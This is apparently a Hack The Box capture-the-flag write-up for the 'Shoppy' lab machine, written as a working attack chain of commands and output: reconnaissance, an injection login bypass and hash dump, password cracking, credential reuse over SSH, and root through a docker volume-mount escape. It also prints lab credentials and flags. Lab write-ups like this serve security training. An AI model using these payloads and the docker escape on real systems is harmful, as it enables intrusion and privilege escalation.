HTB Shoppy (done)
# Shoppy
# Notes
OS: Linux
Technology: go1.18.1
IP Address: 10.129.227.233
Open ports:
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
80/tcp open http nginx 1.23.1
9093/tcp open http Golang net/http server
# Users and passwords
From: http://shoppy.htb/admin
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
cracked password: ---
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
cracked password: remembermethisway
---
From: http://mattermost.shoppy.htb/shoppy/channels/deploy-machine
username: jaeger
password: Sh0ppyBest@pp!
---
From /home/deploy/password-manager
username: deploy
password: Deploying@pp!
---
# Nmap
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ sudo nmap -A -sV --script=default -p- -oA 10.129.227.233_nmap 10.129.227.233 ; cat 10.129.227.233_nmap.nmap | grep -E "^[0-9]{1,}/(tcp|udp)"
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-22 11:26 CEST
Nmap scan report for 10.129.227.233
Host is up (0.038s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 9e:5e:83:51:d9:9f:89:ea:47:1a:12:eb:81:f9:22:c0 (RSA)
| 256 58:57:ee:eb:06:50:03:7c:84:63:d7:a3:41:5b:1a:d5 (ECDSA)
|_ 256 3e:9d:0a:42:90:44:38:60:b3:b6:2c:e9:bd:9a:67:54 (ED25519)
80/tcp open http nginx 1.23.1
|_http-title: Did not follow redirect to http://shoppy.htb
|_http-server-header: nginx/1.23.1
9093/tcp open http Golang net/http server
|_http-title: Site doesn't have a title (text/plain; version=0.0.4; charset=utf-8).
|_http-trane-info: Problem with XML parsing of /evox/about
| fingerprint-strings:
| GenericLines:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest, HTTPOptions:
| HTTP/1.0 200 OK
| Content-Type: text/plain; version=0.0.4; charset=utf-8
| Date: Tue, 22 Apr 2025 09:27:40 GMT
| HELP go_gc_cycles_automatic_gc_cycles_total Count of completed GC cycles generated by the Go runtime.
| TYPE go_gc_cycles_automatic_gc_cycles_total counter
| go_gc_cycles_automatic_gc_cycles_total 4
| HELP go_gc_cycles_forced_gc_cycles_total Count of completed GC cycles forced by the application.
| TYPE go_gc_cycles_forced_gc_cycles_total counter
| go_gc_cycles_forced_gc_cycles_total 0
| HELP go_gc_cycles_total_gc_cycles_total Count of all completed GC cycles.
| TYPE go_gc_cycles_total_gc_cycles_total counter
| go_gc_cycles_total_gc_cycles_total 4
| HELP go_gc_duration_seconds A summary of the pause duration of garbage collection cycles.
| TYPE go_gc_duration_seconds summary
| go_gc_duration_seconds{quantile="0"} 2.2843e-05
| go_gc_duration_seconds{quantile="0.25"} 4.2269e-05
|_ go_gc_dur
# Add IP to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ cat /etc/hosts | tail -n1
10.129.227.233 shoppy.htb
# Ffuf: http://shoppy.htb/
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ ffuf -u http://shoppy.htb/FUZZ -c -w /usr/share/wordlists/dirb/big.txt -ac -recursion -recursion-depth=1 -o shoppy.htb_ffuz -of all -e .php,.html,.txt,.bac,.backup,.md,.git
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/big.txt
:: Extensions : .php .html .txt .bac .backup .md .git
:: Output file : shoppy.htb_ffuz.{json,ejson,html,md,csv,ecsv}
:: File format : all
:: Follow redirects : false
:: Calibration : true
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
ADMIN [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 34ms]
Admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 45ms]
Login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 55ms]
admin [Status: 302, Size: 28, Words: 4, Lines: 1, Duration: 36ms]
assets [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 38ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/assets/FUZZ
css [Status: 301, Size: 173, Words: 7, Lines: 11, Duration: 35ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/css/FUZZ
exports [Status: 301, Size: 181, Words: 7, Lines: 11, Duration: 41ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/exports/FUZZ
favicon.ico [Status: 200, Size: 213054, Words: 56, Lines: 89, Duration: 48ms]
fonts [Status: 301, Size: 177, Words: 7, Lines: 11, Duration: 40ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/fonts/FUZZ
images [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 37ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/images/FUZZ
js [Status: 301, Size: 171, Words: 7, Lines: 11, Duration: 39ms]
[INFO] Adding a new job to the queue: http://shoppy.htb/js/FUZZ
login [Status: 200, Size: 1074, Words: 152, Lines: 26, Duration: 45ms]
[INFO] Starting queued job on target: http://shoppy.htb/assets/FUZZ
css [Status: 301, Size: 187, Words: 7, Lines: 11, Duration: 49ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/css/
fonts [Status: 301, Size: 191, Words: 7, Lines: 11, Duration: 35ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/fonts/
img [Status: 301, Size: 187, Words: 7, Lines: 11, Duration: 54ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/img/
js [Status: 301, Size: 185, Words: 7, Lines: 11, Duration: 37ms]
[WARN] Directory found, but recursion depth exceeded. Ignoring: http://shoppy.htb/assets/js/
[INFO] Starting queued job on target: http://shoppy.htb/css/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/exports/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/fonts/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/images/FUZZ
[INFO] Starting queued job on target: http://shoppy.htb/js/FUZZ
:: Progress: [163752/163752] :: Job [7/7] :: 980 req/sec :: Duration: [0:03:01] :: Errors: 0 ::
# Ffuf subdomain: http://shoppy.htb
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ ffuf -u http://shoppy.htb -H "Host: FUZZ.shoppy.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -o shoppy.htb_ffuz_subdomain | grep -v 169
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://shoppy.htb
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
:: Header : Host: FUZZ.shoppy.htb
:: Output file : shoppy.htb_ffuz_subdomain
:: File format : json
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
mattermost [Status: 200, Size: 3122, Words: 141, Lines: 1, Duration: 143ms]
:: Progress: [100000/100000] :: Job [1/1] :: 956 req/sec :: Duration: [0:01:41] :: Errors: 0 ::
# Add subdomain to /etc/hosts
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ cat /etc/hosts | tail -n1
10.129.227.233 shoppy.htb mattermost.shoppy.htb
# SQLi - http://shoppy.htb/login
POST /login HTTP/1.1
Host: shoppy.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 41
Origin: http://shoppy.htb
Connection: keep-alive
Referer: http://shoppy.htb/login
Cookie: rl_user_id=RudderEncrypt%3AU2FsdGVkX1%2BpefoBXQAM%2BkfYT%2F8HeWLCRk7icmMeO4P09Stpf%2F8%2FYOYtUusflS%2B4; rl_anonymous_id=RudderEncrypt%3AU2FsdGVkX1%2BtedtVziuNFjHQBQ8kegmnLwcI2b3Xx7h7QvH7AVLTIJ9PYS6fqI9rn8pIiaA5vjVmNUs2YQPyGQ%3D%3D; rl_group_id=RudderEncrypt%3AU2FsdGVkX18w0KLES6gq58DtB8T6E1J%2BCIyJNdiKBs4%3D; rl_trait=RudderEncrypt%3AU2FsdGVkX19qM2aCN37EowDCClirJ2rXgv5XC2s4Xkc%3D; rl_group_trait=RudderEncrypt%3AU2FsdGVkX1%2FL5u0nLaLgy%2FVscFCisBYTSnGiux0RhgU%3D
Upgrade-Insecure-Requests: 1
Priority: u=0, i

username=admin'+||+'a'=='a&password=bbb

HTTP/1.1 302 Found
Server: nginx/1.23.1
Date: Tue, 22 Apr 2025 11:55:09 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 56
Connection: keep-alive
Location: /admin
Vary: Accept
Set-Cookie: connect.sid=s%3ADJE18og3r5Om-H_9uQy62RhGBbsKa-IJ.gOedsMQpmqyATk1QxW%2FEqns0fGagz4dHsHTsLhuZ2h0; Path=/; HttpOnly

Found. Redirecting to /admin
# Second SQLi after bypass admin login: http://shoppy.htb/admin
http://shoppy.htb/admin/search-users
Get info about logins and passwords. Payload: admin' || 'a'=='a
0
_id "62db0e93d6d6a999a66ee67a"
username "admin"
password "23c6877d9e2b564ef8b32c3a23de27b2"
1
_id "62db0e93d6d6a999a66ee67b"
username "josh"
password "6ebcea65320589ca4f2f1ce039975995"
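Both injections above (the /login bypass and the /admin/search-users dump) succeed because the submitted username is evaluated as part of the query expression instead of being compared as data. The example below is added here and is not the writeup's or the Shoppy application's code: it assumes a JavaScript `$where`-style predicate (the real backend is not on the page) and places that vulnerable lookup beside a hardened exact-match lookup.

```javascript
// Added example (not code from the writeup or from the Shoppy application).
// Assumed reconstruction: a user lookup that splices the submitted username
// into a JavaScript predicate string, as a MongoDB $where filter would, next
// to a hardened lookup that treats the username strictly as data.

// Constructed records, mirroring the two rows /admin/search-users returned.
const USERS = [
  { _id: "62db0e93d6d6a999a66ee67a", username: "admin", password: "23c6877d9e2b564ef8b32c3a23de27b2" },
  { _id: "62db0e93d6d6a999a66ee67b", username: "josh", password: "6ebcea65320589ca4f2f1ce039975995" },
];

// VULNERABLE: equivalent to find({ $where: "this.username == '" + name + "'" }).
// The predicate is compiled as JavaScript, so a quote in the input closes the
// string literal and everything after it becomes part of the expression.
function findUsersVulnerable(name) {
  const predicate = new Function("return this.username == '" + name + "'");
  return USERS.filter((u) => predicate.call(u));
}

// HARDENED: the input must be a plain string of sane length (an object such as
// {"$ne": ""} fails the typeof check) and is compared with strict equality,
// so quotes and operators inside it carry no meaning.
function findUsersSafe(name) {
  if (typeof name !== "string" || name.length === 0 || name.length > 64) return [];
  return USERS.filter((u) => u.username === name);
}

// The writeup's form body  username=admin'+||+'a'=='a  decodes to this string.
const PAYLOAD = "admin' || 'a'=='a";

// Side-by-side result: the vulnerable lookup returns every row (the predicate
// becomes  this.username == 'admin' || 'a'=='a', which is always true), while
// the hardened lookup returns nothing for the payload and one row for a real user.
function demo() {
  const names = (rows) => rows.map((u) => u.username);
  return {
    vulnerable: names(findUsersVulnerable(PAYLOAD)),
    hardened: names(findUsersSafe(PAYLOAD)),
    hardenedRealUser: names(findUsersSafe("josh")),
  };
}

console.log(demo());
```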
# Cracking passwords
username "admin" password "23c6877d9e2b564ef8b32c3a23de27b2" cracked password: ---
username "josh" password "6ebcea65320589ca4f2f1ce039975995" cracked password: remembermethisway
# Get creds from website: http://mattermost.shoppy.htb/shoppy/channels/deploy-machine
Login to website http://mattermost.shoppy.htb with creds: username: josh password: remembermethisway
http://mattermost.shoppy.htb/shoppy/channels/deploy-machine username: jaeger password: Sh0ppyBest@pp!
# Read flag: user.txt
username: jaeger password: Sh0ppyBest@pp!
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ ssh jaeger@10.129.227.233
The authenticity of host '10.129.227.233 (10.129.227.233)' can't be established.
ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.227.233' (ED25519) to the list of known hosts.
jaeger@10.129.227.233's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ find / -name "user.txt" 2>/dev/null
/home/jaeger/user.txt
jaeger@shoppy:~$ cat /home/jaeger/user.txt
2372108c839ac2951a4fb7a6b7e42647
jaeger@shoppy:~$
# sudoers for user
jaeger@shoppy:/home/deploy$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
jaeger@shoppy:/home/deploy$ sudo -l
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager
jaeger@shoppy:/home/deploy$ file /home/deploy/password-manager
/home/deploy/password-manager: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=400b2ed9d2b4121f9991060f343348080d2905d1, for GNU/Linux 3.2.0, not stripped
jaeger@shoppy:/home/deploy$ ls -la /home/deploy/password-manager
-rwxr--r-- 1 deploy deploy 18440 Jul 22  2022 /home/deploy/password-manager
jaeger@shoppy:/home/deploy$
# Privilege Escalation
## Get another creds from /home/deploy/password-manager
username: deploy password: Deploying@pp!
jaeger@shoppy:/home/deploy$ strings -eb /home/deploy/password-manager
Sample
jaeger@shoppy:/home/deploy$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
jaeger@shoppy:/home/deploy$
## SSH login as user: deploy
username: deploy password: Deploying@pp!
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Shoppy]
└─$ ssh deploy@10.129.227.233
deploy@10.129.227.233's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$
# Read flag: root.txt
```
$ docker ps
CONTAINER ID   IMAGE     COMMAND   CREATED   STATUS    PORTS     NAMES
$ docker iamges
docker: 'iamges' is not a docker command.
See 'docker --help'
$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED       SIZE
alpine       latest    d7d3d98c851f   2 years ago   5.53MB
$ docker run --rm -it -v /:/mnt alpine chroot /mnt sh
# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
# cd /root/
# ls
root.txt
# cat root.txt
64cdbfbcf85bad01b05e9ba52cf32e48
$
```